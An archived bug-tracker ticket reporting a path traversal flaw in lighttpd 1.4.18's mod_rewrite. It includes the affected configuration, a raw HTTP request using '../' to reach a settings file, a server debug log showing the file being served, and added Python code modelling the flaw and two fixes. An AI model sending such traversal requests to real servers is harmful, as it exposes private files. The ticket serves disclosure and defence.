Opened 7 years ago

Closed 7 years ago

#130 closed defect (fixed)

mod_rewrite vulnerability

Reported by: sparrow@…
Owned by: moo
Priority: critical
Milestone:
Component: admin
Version:
Keywords: mod_rewrite
Cc:
Application:
PHP Version:
Other Exts:
SAPI: Others
Probability:
Blocked By:
Blocking:

Description

lighttpd-1.4.18


lighttpd.conf:

$HTTP["host"] =~ "^(www\.)?(.)(.*)\.abc\.de:81$" {
    server.document-root = "/home/abc_de"

    url.rewrite-once = (
        # files  <---------
        "^/files/(.*)$" => "/users/%2/%2%3/files/$1",

        # site
        "^(.*)$" => "/users/%2/%2%3/index.php/$1"
    )
}

request:

telnet test.abc.de 81

---------> GET /files/../settings/myfile.gz HTTP/1.1
Host: abc.de:81
User-Agent: Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1.6) Gecko/20070830 Firefox/2.0.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive



log:

(response.c.205) -- splitting Request-URI

******************************************************************************************************
**** Rewrite: ^/files/(.*)$
******************************************************************************************************

(response.c.206) Request-URI  :  /files/../settings/myfile.gz
(response.c.207) URI-scheme   :  http
(response.c.208) URI-authority:  test.abc.de:81
(response.c.209) URI-path     :  /files/../settings/myfile.gz
(response.c.210) URI-query    :
(response.c.205) -- splitting Request-URI
(response.c.206) Request-URI  :  /users/t/test/files/../settings/myfile.gz
(response.c.207) URI-scheme   :  http
(response.c.208) URI-authority:  test.abc.de:81
(response.c.209) URI-path     :  /users/t/test/files/../settings/myfile.gz
(response.c.210) URI-query    :
(response.c.260) -- sanatising URI

******************************************************************************************************
**** Vulnerability **** (response.c.261) URI-path     :  /users/t/test/settings/myfile.gz
******************************************************************************************************

(mod_access.c.135) -- mod_access_uri_handler called
(response.c.375) -- before doc_root
(response.c.376) Doc-Root     : /home/abc_de
(response.c.377) Rel-Path     : /users/t/test/settings/myfile.gz
(response.c.378) Path         :
(response.c.426) -- after doc_root
(response.c.427) Doc-Root     : /home/abc_de
(response.c.428) Rel-Path     : /users/t/test/settings/myfile.gz
(response.c.429) Path         : /home/abc_de/users/t/test/settings/myfile.gz
(response.c.446) -- logical -> physical
(response.c.447) Doc-Root     : /home/abc_de
(response.c.448) Rel-Path     : /users/t/test/settings/myfile.gz
(response.c.449) Path         : /home/abc_de/users/t/test/settings/myfile.gz
(response.c.466) -- handling physical path
(response.c.467) Path         : /home/abc_de/users/t/test/settings/myfile.gz
(response.c.474) -- file found
(response.c.475) Path         : /home/abc_de/users/t/test/settings/myfile.gz
(response.c.613) -- handling subrequest
(response.c.614) Path         : /home/abc_de/users/t/test/settings/myfile.gz
(mod_access.c.135) -- mod_access_uri_handler called
(mod_staticfile.c.394) -- handling file as static file
(response.c.625) -- subrequest finished
(response.c.114) Response-Header:
HTTP/1.1 200 OK
Content-Type: application/x-gzip
Accept-Ranges: bytes
ETag: "210873236"
Last-Modified: Sun, 30 Sep 2007 02:03:03 GMT
Content-Length: 6057
Date: Sun, 30 Sep 2007 13:50:39 GMT
Server: Apache Server
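
The log above shows the $1 capture being substituted while it still contains "..", with the path cleaned only afterwards. The Python model below of that ordering is an added example, not code from the ticket or from lighttpd. The host pattern and rules are copied from the lighttpd.conf above; the function names and the two hardened variants are assumptions made for illustration.

```python
import posixpath
import re

# Host pattern and rewrite rules copied from the ticket's lighttpd.conf.
# Function names and both hardened variants are hypothetical.
HOST_RE = re.compile(r"^(www\.)?(.)(.*)\.abc\.de:81$")
RULES = [
    (re.compile(r"^/files/(.*)$"), "/users/%2/%2%3/files/$1"),
    (re.compile(r"^(.*)$"), "/users/%2/%2%3/index.php/$1"),
]


def rewrite(host, path):
    """rewrite-once semantics: the first matching rule wins.
    %N is filled from the host match, $N from the path match."""
    h = HOST_RE.match(host)
    if h is None:
        return None
    for pattern, target in RULES:
        p = pattern.match(path)
        if p:
            def fill(m):
                src = h if m.group(1) == "%" else p
                return src.group(int(m.group(2))) or ""
            return re.sub(r"([%$])(\d)", fill, target)
    return None


def rewrite_then_clean(host, path):
    """Order shown in the ticket's log: rewrite, then collapse '..'."""
    out = rewrite(host, path)
    return None if out is None else posixpath.normpath(out)


def clean_then_rewrite(host, path):
    """Variant 1: collapse '..' in the request path before matching rules."""
    return rewrite_then_clean(host, posixpath.normpath(path))


def rewrite_confined(host, path, rule_prefix="/files/"):
    """Variant 2 (for the /files/ rule): keep the ticket's order, but reject
    a result that is no longer below what the rule yields for an empty $1."""
    base = rewrite(host, rule_prefix)
    final = rewrite_then_clean(host, path)
    if base is None or final is None or not (final + "/").startswith(base):
        return None
    return final
```

With the ticket's host and request path, rewrite_then_clean reproduces the path from the log, clean_then_rewrite sends the request to the index.php rule instead, and rewrite_confined rejects it.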

Change History (1)

comment:1 Changed 7 years ago by moo

  • Resolution set to fixed
  • Status changed from new to closed

Please move to http://trac.lighttpd.net/, thanks.
